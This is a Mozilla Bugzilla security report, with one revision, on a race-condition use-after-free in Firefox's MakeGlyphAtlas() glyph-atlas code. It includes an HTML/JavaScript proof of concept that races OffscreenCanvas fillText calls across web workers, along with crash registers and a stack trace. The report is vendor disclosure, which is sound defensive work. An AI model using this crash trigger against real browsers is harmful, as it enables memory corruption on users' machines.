Bug 1823365 Comment 0 Edit History

Note: The actual edited comment in the bug view page will always show the original commenter’s name and original timestamp.

Original comment by

Looben Yang

on 2023-03-20 03:20:10 PDT

VULNERABILITY DETAILS
	Specifically crafted HTML file can trigger Use After Free in GFX code MakeGlyphAtlas(). This bug can potentially be exploited to achieve one click Remote Code Execution in content process.


	gGlyphMask is static variable in gfxFontMissingGlyphs.cpp, so it's intended to be initialized/constructed once only.

		static RefPtr<SourceSurface> gGlyphMask;
		
	However, the code inside function MakeGlyphAtlas() in file gfxFontMissingGlyphs.cpp is subject to race condition.

		static bool MakeGlyphAtlas(const DeviceColor& aColor) {
		...
		  if (!gGlyphMask) {
			gGlyphMask = gGlyphDrawTarget->CreateSourceSurfaceFromData(
		...
		}	

	When JS script like 'ctx0.fillText("&#9175;&#9856;ïž&cent;"' from the PoC is called from web worker. MakeGlyphAtlas() is executed in worker thread.

	If two threads check gGlyphMask and gGlyphMask is null in both cases, then they both satisfy the if clause of  "if (!gGlyphMask)", and try to call CreateSourceSurfaceFromData() to create a new SourceSurfaceSkia object and assign it as RefPtr to gGlyphMask. One thead executes  CreateSourceSurfaceFromData() sooner and creates an SourceSurfaceSkia object first. Then when the second thread executes CreateSourceSurfaceFromData() and try to assign the newly created second SourceSurfaceSkia object to gGlyphMask, gGlyphMask is not null (different from when it's being null check), so the assignment ("=") operation would release the firstly created SourceSurfaceSkia object. 

	After that, when the first thread continues to execute the subsequent code, the operations against gGlyphMask are Use After Free:

	  gGlyphDrawTarget->MaskSurface(ColorPattern(aColor), gGlyphMask, Point(0, 0),
									DrawOptions(1.0f, CompositionOp::OP_SOURCE));


	
VERSION
	Firefox	113.0a1 (2023-03-19) (64-bit)
	OS	Windows 11 Home 22H2 (Build 22621.1413)


REPRODUCTION CASE  (UAF_MakeGlyphAtlas_PoC.html)
	<script>
	workers = [];
	workerCode = 'offscreenCanvas0 = new OffscreenCanvas(100, 100); \n'
	workerCode += 'ctx0 = offscreenCanvas0.getContext("2d"); \n'
	workerCode += 'setTimeout(function(){ctx0.fillText("&#9175;&#9856;ïž&cent;",  47,15);}, 2);\n'
	workerCode += 'setTimeout(function(){ctx0.fillText("&#9175;&#9856;ïž&cent;",  47,15);}, 1);\n'

	for(var i = 0; i < 10; i++)
	{
		var blob = new Blob([workerCode],{type: "text/javascript"});
		workers[i] = new Worker(window.URL.createObjectURL(blob));
	}

	setTimeout(function(){location.reload();},300); 
	</script>

    

Type of crash: content process
Crash State: 


	(4048.ee0): Access violation - code c0000005 (!!! second chance !!!)
	xul!mozilla::gfx::GetSkImageForSurface+0x36:
	00007ff9`d1774436 488b4008        mov     rax,qword ptr [rax+8] ds:e5e5e5e5`e5e5e5ed=????????????????
	9:318> r
	rax=e5e5e5e5e5e5e5e5 rbx=000000ffebb7ac10 rcx=000000ffebb7abf8
	rdx=000002d63522d800 rsi=000000ffebb7abf8 rdi=000002d63522d800
	rip=00007ff9d1774436 rsp=000000ffebb7aa50 rbp=0000000000000000
	 r8=000000ffebb7ac10  r9=0000000000000000 r10=00000fff3a159cf2
	r11=0014000000000400 r12=000002d63522d800 r13=000002d6352a7700
	r14=000000ffebb7ac20 r15=000000ffebb7adc0
	iopl=0         nv up ei pl nz na po nc
	cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010204
	xul!mozilla::gfx::GetSkImageForSurface+0x36:
	00007ff9`d1774436 488b4008        mov     rax,qword ptr [rax+8] ds:e5e5e5e5`e5e5e5ed=????????????????
	9:318> dv
		   aSurface = 0x000002d6`3522d800
			  aLock = 0x000000ff`ebb7ac10 Nothing
			aBounds = <value unavailable>
			aMatrix = <value unavailable>
				map = struct mozilla::gfx::DataSourceSurface::MappedSurface
			 pixmap = class SkPixmap
			  image = class sk_sp<SkImage>
		dataSurface = <value unavailable>
		releaseProc = <value unavailable>
			   surf = <value unavailable>
	9:318> k
	 # Child-SP          RetAddr           Call Site
	00 000000ff`ebb7aa50 00007ff9`d177638c xul!mozilla::gfx::GetSkImageForSurface+0x36 [/builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp @ 246] 
	01 (Inline Function) --------`-------- xul!mozilla::gfx::ExtractAlphaForSurface+0xb [/builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp @ 460] 
	02 000000ff`ebb7abd0 00007ff9`d18d527e xul!mozilla::gfx::DrawTargetSkia::MaskSurface+0x12c [/builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp @ 1441] 
	03 (Inline Function) --------`-------- xul!MakeGlyphAtlas+0x1b1 [/builds/worker/checkouts/gecko/gfx/thebes/gfxFontMissingGlyphs.cpp @ 112] 
	04 (Inline Function) --------`-------- xul!GetGlyphAtlas+0x222 [/builds/worker/checkouts/gecko/gfx/thebes/gfxFontMissingGlyphs.cpp @ 131] 
	05 000000ff`ebb7ad70 00007ff9`d18c062a xul!gfxFontMissingGlyphs::DrawMissingGlyph+0x4fe [/builds/worker/checkouts/gecko/gfx/thebes/gfxFontMissingGlyphs.cpp @ 418] 
	06 000000ff`ebb7aef0 00007ff9`d0b29ef9 xul!gfxFont::DrawMissingGlyph+0x3ba [/builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp @ 2202] 
	07 (Inline Function) --------`-------- xul!gfxFont::DrawGlyphs+0x1be5 [/builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp @ 2030] 
	08 000000ff`ebb7b050 00007ff9`d0a177b9 xul!gfxFont::Draw+0x2179 [/builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp @ 2530] 
	09 (Inline Function) --------`-------- xul!gfxTextRun::DrawGlyphs+0x5c [/builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.cpp @ 429] 
	0a 000000ff`ebb7bb10 00007ff9`d22906e6 xul!gfxTextRun::Draw+0x4b9 [/builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.cpp @ 683] 
	0b 000000ff`ebb7cbf0 00007ff9`d2f4defc xul!mozilla::dom::CanvasBidiProcessor::DrawText+0x576 [/builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp @ 4124] 
	0c 000000ff`ebb7ce70 00007ff9`d2f4d8fd xul!nsBidiPresUtils::ProcessSimpleRun+0x11c [/builds/worker/checkouts/gecko/layout/base/nsBidiPresUtils.cpp @ 2390] 
	0d 000000ff`ebb7cf80 00007ff9`d224b3cf xul!nsBidiPresUtils::ProcessText+0x1dd [/builds/worker/checkouts/gecko/layout/base/nsBidiPresUtils.cpp @ 2165] 
	0e 000000ff`ebb7d140 00007ff9`d224a72a xul!mozilla::dom::CanvasRenderingContext2D::DrawOrMeasureText+0xc9f [/builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp @ 4448] 
	0f 000000ff`ebb7d400 00007ff9`d1c9c15a xul!mozilla::dom::CanvasRenderingContext2D::FillText+0x2a [/builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp @ 3863] 
	10 000000ff`ebb7d440 00007ff9`d0831055 xul!mozilla::dom::OffscreenCanvasRenderingContext2D_Binding::fillText+0x2ea [/builds/worker/workspace/obj-build/dom/bindings/OffscreenCanvasRenderingContext2DBinding.cpp @ 3904] 
	11 000000ff`ebb7d5a0 00007ff9`d0eb9e19 xul!mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions>+0x145 [/builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp @ 3318] 
	12 (Inline Function) --------`-------- xul!CallJSNative+0x181 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 459] 
	13 (Inline Function) --------`-------- xul!js::InternalCallOrConstruct+0x569 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 553] 
	14 (Inline Function) --------`-------- xul!InternalCall+0x569 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 620] 
	15 (Inline Function) --------`-------- xul!js::CallFromStack+0x569 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 625] 
	16 000000ff`ebb7d660 00007ff9`d08a0a55 xul!Interpret+0xd479 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 3368] 
	17 (Inline Function) --------`-------- xul!js::RunScript+0x5c2 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 431] 
	18 (Inline Function) --------`-------- xul!js::InternalCallOrConstruct+0x6ea [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 585] 
	19 (Inline Function) --------`-------- xul!InternalCall+0x6ea [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 620] 
	1a 000000ff`ebb7db20 00007ff9`d094ab9f xul!js::Call+0x755 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 652] 
	1b 000000ff`ebb7dc30 00007ff9`cf260440 xul!JS::Call+0x2bf [/builds/worker/checkouts/gecko/js/src/vm/CallAndConstruct.cpp @ 117] 
	1c 000000ff`ebb7dd60 00007ff9`cfba8d05 xul!mozilla::dom::Function::Call+0x1a0 [/builds/worker/workspace/obj-build/dom/bindings/FunctionBinding.cpp @ 50] 
	1d (Inline Function) --------`-------- xul!mozilla::dom::Function::Call+0x144 [/builds/worker/workspace/obj-build/dist/include/mozilla/dom/FunctionBinding.h @ 71] 
	1e 000000ff`ebb7dec0 00007ff9`d2b86376 xul!mozilla::dom::CallbackTimeoutHandler::Call+0x1c5 [/builds/worker/checkouts/gecko/dom/base/TimeoutHandler.cpp @ 167] 
	1f 000000ff`ebb7e1a0 00007ff9`cf0da944 xul!mozilla::dom::WorkerPrivate::RunExpiredTimeouts+0x486 [/builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp @ 5163] 
	20 000000ff`ebb7e330 00007ff9`cf782505 xul!mozilla::dom::WorkerRunnable::Run+0x1a4 [/builds/worker/checkouts/gecko/dom/workers/WorkerRunnable.cpp @ 377] 
	21 (Inline Function) --------`-------- xul!nsTimerImpl::Fire::<lambda_2>::operator()+0x1d [/builds/worker/checkouts/gecko/xpcom/threads/nsTimerImpl.cpp @ 656] 
	22 (Inline Function) --------`-------- xul!mozilla::detail::VariantImplementation<unsigned char,1,nsCOMPtr<nsITimerCallback>,nsCOMPtr<nsIObserver>,nsTimerImpl::FuncCallback,nsTimerImpl::ClosureCallback>::matchN+0x173 [/builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h @ 309] 
	23 (Inline Function) --------`-------- xul!mozilla::detail::VariantImplementation<unsigned char,0,nsTimerImpl::UnknownCallback,nsCOMPtr<nsITimerCallback>,nsCOMPtr<nsIObserver>,nsTimerImpl::FuncCallback,nsTimerImpl::ClosureCallback>::matchN+0x184 [/builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h @ 318] 
	24 (Inline Function) --------`-------- xul!mozilla::Variant<nsTimerImpl::UnknownCallback,nsCOMPtr<nsITimerCallback>,nsCOMPtr<nsIObserver>,nsTimerImpl::FuncCallback,nsTimerImpl::ClosureCallback>::matchN+0x184 [/builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h @ 902] 
	25 (Inline Function) --------`-------- xul!mozilla::Variant<nsTimerImpl::UnknownCallback,nsCOMPtr<nsITimerCallback>,nsCOMPtr<nsIObserver>,nsTimerImpl::FuncCallback,nsTimerImpl::ClosureCallback>::match+0x184 [/builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h @ 857] 
	26 000000ff`ebb7e4d0 00007ff9`cf773b73 xul!nsTimerImpl::Fire+0x3a5 [/builds/worker/checkouts/gecko/xpcom/threads/nsTimerImpl.cpp @ 654] 
	27 000000ff`ebb7e660 00007ff9`d2b8c62a xul!nsTimerEvent::Run+0x63 [/builds/worker/checkouts/gecko/xpcom/threads/TimerThread.cpp @ 469] 
	28 000000ff`ebb7e840 00007ff9`cf0da944 xul!mozilla::dom::`anonymous namespace'::ExternalRunnableWrapper::WorkerRun+0x2a [/builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp @ 201] 
	29 000000ff`ebb7e8a0 00007ff9`d07d9dce xul!mozilla::dom::WorkerRunnable::Run+0x1a4 [/builds/worker/checkouts/gecko/dom/workers/WorkerRunnable.cpp @ 377] 
	2a 000000ff`ebb7ea40 00007ff9`d07eeb9e xul!nsThread::ProcessNextEvent+0x106e [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 1234] 
	2b 000000ff`ebb7ede0 00007ff9`cf0da19c xul!NS_ProcessNextEvent+0x3e [/builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp @ 477] 
	2c 000000ff`ebb7ee30 00007ff9`cfeabbe2 xul!mozilla::dom::WorkerPrivate::DoRunLoop+0x1cc [/builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp @ 3281] 
	2d 000000ff`ebb7ef30 00007ff9`d07d9dce xul!mozilla::dom::workerinternals::`anonymous namespace'::WorkerThreadPrimaryRunnable::Run+0x2a2 [/builds/worker/checkouts/gecko/dom/workers/RuntimeService.cpp @ 2049] 
	2e 000000ff`ebb7f0c0 00007ff9`d07d8985 xul!nsThread::ProcessNextEvent+0x106e [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 1234] 
	2f (Inline Function) --------`-------- xul!NS_ProcessNextEvent+0x29 [/builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp @ 477] 
	30 000000ff`ebb7f460 00007ff9`cf93340f xul!mozilla::ipc::MessagePumpForNonMainThreads::Run+0xf5 [/builds/worker/checkouts/gecko/ipc/glue/MessagePump.cpp @ 300] 
	31 (Inline Function) --------`-------- xul!MessageLoop::RunInternal+0x16 [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 381] 
	32 000000ff`ebb7f510 00007ff9`cef5fc7e xul!MessageLoop::RunHandler+0x2f [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 375] 
	33 000000ff`ebb7f560 00007ff9`cf775f03 xul!MessageLoop::Run+0x4e [/builds/worker/checkouts/gecko/ipc/chromium/src/base/message_loop.cc @ 357] 
	34 000000ff`ebb7f5c0 00007ffa`0ebc577c xul!nsThread::ThreadFunc+0xe3 [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 393] 
	35 000000ff`ebb7f780 00007ffa`0ec4a411 nss3!_PR_NativeRunThread+0x13c [/builds/worker/checkouts/gecko/nsprpub/pr/src/threads/combined/pruthr.c @ 421] 
	36 000000ff`ebb7f800 00007ffa`5c849363 nss3!pr_root+0x11 [/builds/worker/checkouts/gecko/nsprpub/pr/src/md/windows/w95thred.c @ 140] 
	37 000000ff`ebb7f830 00007ffa`5dc626bd ucrtbase!thread_start<unsigned int (__cdecl*)(void *),1>+0x93
	38 000000ff`ebb7f860 00007ffa`1f6251c8 KERNEL32!BaseThreadInitThunk+0x1d
	39 (Inline Function) --------`-------- mozglue!mozilla::interceptor::FuncHook<mozilla::interceptor::WindowsDllInterceptor<mozilla::interceptor::VMSharingPolicyShared>,void (*)(int, void *, void *)>::operator()+0x15 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/nsWindowsDllInterceptor.h @ 150] 
	3a 000000ff`ebb7f890 00007ffa`5ecca9f8 mozglue!patched_BaseThreadInitThunk+0x28 [/builds/worker/checkouts/gecko/toolkit/xre/dllservices/mozglue/WindowsDllBlocklist.cpp @ 592] 
	3b 000000ff`ebb7f900 00000000`00000000 ntdll!RtlUserThreadStart+0x28
	9:318> dx -id 0,9 -r1 ((xul!mozilla::gfx::SourceSurface *)0x2d63522d800)
	((xul!mozilla::gfx::SourceSurface *)0x2d63522d800)                 : 0x2d63522d800 [Type: mozilla::gfx::SourceSurface *]
		[+0x008] mWeakRef         [Type: RefPtr<mozilla::detail::ThreadSafeWeakReference>]
		[+0x010] mUserData        [Type: mozilla::gfx::ThreadSafeUserData]
	9:318> dx -id 0,9 -r1 (*((xul!RefPtr<mozilla::detail::ThreadSafeWeakReference> *)0x2d63522d808))
	(*((xul!RefPtr<mozilla::detail::ThreadSafeWeakReference> *)0x2d63522d808))                 [Type: RefPtr<mozilla::detail::ThreadSafeWeakReference>]
		[+0x000] mRawPtr          : 0xe5e5e5e5e5e5e5e5 [Type: mozilla::detail::ThreadSafeWeakReference *]
	9:318> dx -id 0,9 -r1 ((xul!mozilla::detail::ThreadSafeWeakReference *)0xe5e5e5e5e5e5e5e5)
	((xul!mozilla::detail::ThreadSafeWeakReference *)0xe5e5e5e5e5e5e5e5)                 : 0xe5e5e5e5e5e5e5e5 [Type: mozilla::detail::ThreadSafeWeakReference *]
		[+0x000] mRefCnt          [Type: mozilla::detail::RC<unsigned long long,0>]
		[+0x008] mStrongCnt       [Type: mozilla::detail::RC<unsigned long long,0>]
		[+0x010] mPtr             : Unable to read memory at Address 0xe5e5e5e5e5e5e5f5



	
CREDIT INFORMATION
Reporter credit: Looben Yang

Revision 1 by

Frederik Braun [:freddy]

on 2023-03-20 05:18:33 PDT

VULNERABILITY DETAILS
	Specifically crafted HTML file can trigger Use After Free in GFX code `MakeGlyphAtlas()`. This bug can potentially be exploited to achieve one click Remote Code Execution in content process.

`gGlyphMask` is static variable in `gfxFontMissingGlyphs.cpp`, so it's intended to be initialized/constructed once only.

		static RefPtr<SourceSurface> gGlyphMask;
		
However, the code inside function MakeGlyphAtlas() in file gfxFontMissingGlyphs.cpp is subject to race condition.

```cpp
		static bool MakeGlyphAtlas(const DeviceColor& aColor) {
		...
		  if (!gGlyphMask) {
			gGlyphMask = gGlyphDrawTarget->CreateSourceSurfaceFromData(
		...
		}	
```
When JS script like `ctx0.fillText("&#9175;&#9856;ïž&cent;")` from the PoC is called from web worker. `MakeGlyphAtlas()` is executed in worker thread.

If two threads check `gGlyphMask` and `gGlyphMask` is null in both cases, then they both satisfy the if clause of  `if (!gGlyphMask)`, and try to call `CreateSourceSurfaceFromData()` to create a new `SourceSurfaceSkia` object and assign it as `RefPtr` to `gGlyphMask`. One thread executes  `CreateSourceSurfaceFromData()` sooner and creates an `SourceSurfaceSkia` object first. Then when the second thread executes `CreateSourceSurfaceFromData()` and try to assign the newly created second `SourceSurfaceSkia` object to `gGlyphMask`, `gGlyphMask` is not null (different from when it's being null check), so the assignment ("=") operation would release the firstly created `SourceSurfaceSkia` object. 

After that, when the first thread continues to execute the subsequent code, the operations against `gGlyphMask` are Use After Free:

```cpp
gGlyphDrawTarget->MaskSurface(ColorPattern(aColor), gGlyphMask, Point(0, 0),
							DrawOptions(1.0f, CompositionOp::OP_SOURCE));

```
	
VERSION
	Firefox	113.0a1 (2023-03-19) (64-bit)
	OS	Windows 11 Home 22H2 (Build 22621.1413)


REPRODUCTION CASE  (UAF_MakeGlyphAtlas_PoC.html)
```html	
<script>
	workers = [];
	workerCode = 'offscreenCanvas0 = new OffscreenCanvas(100, 100); \n'
	workerCode += 'ctx0 = offscreenCanvas0.getContext("2d"); \n'
	workerCode += 'setTimeout(function(){ctx0.fillText("&#9175;&#9856;ïž&cent;",  47,15);}, 2);\n'
	workerCode += 'setTimeout(function(){ctx0.fillText("&#9175;&#9856;ïž&cent;",  47,15);}, 1);\n'

	for(var i = 0; i < 10; i++)
	{
		var blob = new Blob([workerCode],{type: "text/javascript"});
		workers[i] = new Worker(window.URL.createObjectURL(blob));
	}

	setTimeout(function(){location.reload();},300); 
	</script>
```
    

Type of crash: content process
Crash State: 


	(4048.ee0): Access violation - code c0000005 (!!! second chance !!!)
	xul!mozilla::gfx::GetSkImageForSurface+0x36:
	00007ff9`d1774436 488b4008        mov     rax,qword ptr [rax+8] ds:e5e5e5e5`e5e5e5ed=????????????????
	9:318> r
	rax=e5e5e5e5e5e5e5e5 rbx=000000ffebb7ac10 rcx=000000ffebb7abf8
	rdx=000002d63522d800 rsi=000000ffebb7abf8 rdi=000002d63522d800
	rip=00007ff9d1774436 rsp=000000ffebb7aa50 rbp=0000000000000000
	 r8=000000ffebb7ac10  r9=0000000000000000 r10=00000fff3a159cf2
	r11=0014000000000400 r12=000002d63522d800 r13=000002d6352a7700
	r14=000000ffebb7ac20 r15=000000ffebb7adc0
	iopl=0         nv up ei pl nz na po nc
	cs=0033  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010204
	xul!mozilla::gfx::GetSkImageForSurface+0x36:
	00007ff9`d1774436 488b4008        mov     rax,qword ptr [rax+8] ds:e5e5e5e5`e5e5e5ed=????????????????
	9:318> dv
		   aSurface = 0x000002d6`3522d800
			  aLock = 0x000000ff`ebb7ac10 Nothing
			aBounds = <value unavailable>
			aMatrix = <value unavailable>
				map = struct mozilla::gfx::DataSourceSurface::MappedSurface
			 pixmap = class SkPixmap
			  image = class sk_sp<SkImage>
		dataSurface = <value unavailable>
		releaseProc = <value unavailable>
			   surf = <value unavailable>
	9:318> k
	 # Child-SP          RetAddr           Call Site
	00 000000ff`ebb7aa50 00007ff9`d177638c xul!mozilla::gfx::GetSkImageForSurface+0x36 [/builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp @ 246] 
	01 (Inline Function) --------`-------- xul!mozilla::gfx::ExtractAlphaForSurface+0xb [/builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp @ 460] 
	02 000000ff`ebb7abd0 00007ff9`d18d527e xul!mozilla::gfx::DrawTargetSkia::MaskSurface+0x12c [/builds/worker/checkouts/gecko/gfx/2d/DrawTargetSkia.cpp @ 1441] 
	03 (Inline Function) --------`-------- xul!MakeGlyphAtlas+0x1b1 [/builds/worker/checkouts/gecko/gfx/thebes/gfxFontMissingGlyphs.cpp @ 112] 
	04 (Inline Function) --------`-------- xul!GetGlyphAtlas+0x222 [/builds/worker/checkouts/gecko/gfx/thebes/gfxFontMissingGlyphs.cpp @ 131] 
	05 000000ff`ebb7ad70 00007ff9`d18c062a xul!gfxFontMissingGlyphs::DrawMissingGlyph+0x4fe [/builds/worker/checkouts/gecko/gfx/thebes/gfxFontMissingGlyphs.cpp @ 418] 
	06 000000ff`ebb7aef0 00007ff9`d0b29ef9 xul!gfxFont::DrawMissingGlyph+0x3ba [/builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp @ 2202] 
	07 (Inline Function) --------`-------- xul!gfxFont::DrawGlyphs+0x1be5 [/builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp @ 2030] 
	08 000000ff`ebb7b050 00007ff9`d0a177b9 xul!gfxFont::Draw+0x2179 [/builds/worker/checkouts/gecko/gfx/thebes/gfxFont.cpp @ 2530] 
	09 (Inline Function) --------`-------- xul!gfxTextRun::DrawGlyphs+0x5c [/builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.cpp @ 429] 
	0a 000000ff`ebb7bb10 00007ff9`d22906e6 xul!gfxTextRun::Draw+0x4b9 [/builds/worker/checkouts/gecko/gfx/thebes/gfxTextRun.cpp @ 683] 
	0b 000000ff`ebb7cbf0 00007ff9`d2f4defc xul!mozilla::dom::CanvasBidiProcessor::DrawText+0x576 [/builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp @ 4124] 
	0c 000000ff`ebb7ce70 00007ff9`d2f4d8fd xul!nsBidiPresUtils::ProcessSimpleRun+0x11c [/builds/worker/checkouts/gecko/layout/base/nsBidiPresUtils.cpp @ 2390] 
	0d 000000ff`ebb7cf80 00007ff9`d224b3cf xul!nsBidiPresUtils::ProcessText+0x1dd [/builds/worker/checkouts/gecko/layout/base/nsBidiPresUtils.cpp @ 2165] 
	0e 000000ff`ebb7d140 00007ff9`d224a72a xul!mozilla::dom::CanvasRenderingContext2D::DrawOrMeasureText+0xc9f [/builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp @ 4448] 
	0f 000000ff`ebb7d400 00007ff9`d1c9c15a xul!mozilla::dom::CanvasRenderingContext2D::FillText+0x2a [/builds/worker/checkouts/gecko/dom/canvas/CanvasRenderingContext2D.cpp @ 3863] 
	10 000000ff`ebb7d440 00007ff9`d0831055 xul!mozilla::dom::OffscreenCanvasRenderingContext2D_Binding::fillText+0x2ea [/builds/worker/workspace/obj-build/dom/bindings/OffscreenCanvasRenderingContext2DBinding.cpp @ 3904] 
	11 000000ff`ebb7d5a0 00007ff9`d0eb9e19 xul!mozilla::dom::binding_detail::GenericMethod<mozilla::dom::binding_detail::NormalThisPolicy,mozilla::dom::binding_detail::ThrowExceptions>+0x145 [/builds/worker/checkouts/gecko/dom/bindings/BindingUtils.cpp @ 3318] 
	12 (Inline Function) --------`-------- xul!CallJSNative+0x181 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 459] 
	13 (Inline Function) --------`-------- xul!js::InternalCallOrConstruct+0x569 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 553] 
	14 (Inline Function) --------`-------- xul!InternalCall+0x569 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 620] 
	15 (Inline Function) --------`-------- xul!js::CallFromStack+0x569 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 625] 
	16 000000ff`ebb7d660 00007ff9`d08a0a55 xul!Interpret+0xd479 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 3368] 
	17 (Inline Function) --------`-------- xul!js::RunScript+0x5c2 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 431] 
	18 (Inline Function) --------`-------- xul!js::InternalCallOrConstruct+0x6ea [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 585] 
	19 (Inline Function) --------`-------- xul!InternalCall+0x6ea [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 620] 
	1a 000000ff`ebb7db20 00007ff9`d094ab9f xul!js::Call+0x755 [/builds/worker/checkouts/gecko/js/src/vm/Interpreter.cpp @ 652] 
	1b 000000ff`ebb7dc30 00007ff9`cf260440 xul!JS::Call+0x2bf [/builds/worker/checkouts/gecko/js/src/vm/CallAndConstruct.cpp @ 117] 
	1c 000000ff`ebb7dd60 00007ff9`cfba8d05 xul!mozilla::dom::Function::Call+0x1a0 [/builds/worker/workspace/obj-build/dom/bindings/FunctionBinding.cpp @ 50] 
	1d (Inline Function) --------`-------- xul!mozilla::dom::Function::Call+0x144 [/builds/worker/workspace/obj-build/dist/include/mozilla/dom/FunctionBinding.h @ 71] 
	1e 000000ff`ebb7dec0 00007ff9`d2b86376 xul!mozilla::dom::CallbackTimeoutHandler::Call+0x1c5 [/builds/worker/checkouts/gecko/dom/base/TimeoutHandler.cpp @ 167] 
	1f 000000ff`ebb7e1a0 00007ff9`cf0da944 xul!mozilla::dom::WorkerPrivate::RunExpiredTimeouts+0x486 [/builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp @ 5163] 
	20 000000ff`ebb7e330 00007ff9`cf782505 xul!mozilla::dom::WorkerRunnable::Run+0x1a4 [/builds/worker/checkouts/gecko/dom/workers/WorkerRunnable.cpp @ 377] 
	21 (Inline Function) --------`-------- xul!nsTimerImpl::Fire::<lambda_2>::operator()+0x1d [/builds/worker/checkouts/gecko/xpcom/threads/nsTimerImpl.cpp @ 656] 
	22 (Inline Function) --------`-------- xul!mozilla::detail::VariantImplementation<unsigned char,1,nsCOMPtr<nsITimerCallback>,nsCOMPtr<nsIObserver>,nsTimerImpl::FuncCallback,nsTimerImpl::ClosureCallback>::matchN+0x173 [/builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h @ 309] 
	23 (Inline Function) --------`-------- xul!mozilla::detail::VariantImplementation<unsigned char,0,nsTimerImpl::UnknownCallback,nsCOMPtr<nsITimerCallback>,nsCOMPtr<nsIObserver>,nsTimerImpl::FuncCallback,nsTimerImpl::ClosureCallback>::matchN+0x184 [/builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h @ 318] 
	24 (Inline Function) --------`-------- xul!mozilla::Variant<nsTimerImpl::UnknownCallback,nsCOMPtr<nsITimerCallback>,nsCOMPtr<nsIObserver>,nsTimerImpl::FuncCallback,nsTimerImpl::ClosureCallback>::matchN+0x184 [/builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h @ 902] 
	25 (Inline Function) --------`-------- xul!mozilla::Variant<nsTimerImpl::UnknownCallback,nsCOMPtr<nsITimerCallback>,nsCOMPtr<nsIObserver>,nsTimerImpl::FuncCallback,nsTimerImpl::ClosureCallback>::match+0x184 [/builds/worker/workspace/obj-build/dist/include/mozilla/Variant.h @ 857] 
	26 000000ff`ebb7e4d0 00007ff9`cf773b73 xul!nsTimerImpl::Fire+0x3a5 [/builds/worker/checkouts/gecko/xpcom/threads/nsTimerImpl.cpp @ 654] 
	27 000000ff`ebb7e660 00007ff9`d2b8c62a xul!nsTimerEvent::Run+0x63 [/builds/worker/checkouts/gecko/xpcom/threads/TimerThread.cpp @ 469] 
	28 000000ff`ebb7e840 00007ff9`cf0da944 xul!mozilla::dom::`anonymous namespace'::ExternalRunnableWrapper::WorkerRun+0x2a [/builds/worker/checkouts/gecko/dom/workers/WorkerPrivate.cpp @ 201] 
	29 000000ff`ebb7e8a0 00007ff9`d07d9dce xul!mozilla::dom::WorkerRunnable::Run+0x1a4 [/builds/worker/checkouts/gecko/dom/workers/WorkerRunnable.cpp @ 377] 
	2a 000000ff`ebb7ea40 00007ff9`d07eeb9e xul!nsThread::ProcessNextEvent+0x106e [/builds/worker/checkouts/gecko/xpcom/threads/nsThread.cpp @ 1234] 
	2b 000000ff`ebb7ede0 00007ff9`cf0da19c xul!NS_ProcessNextEvent+0x3e [/builds/worker/checkouts/gecko/xpcom/threads/nsThreadUtils.cpp @ 477] 
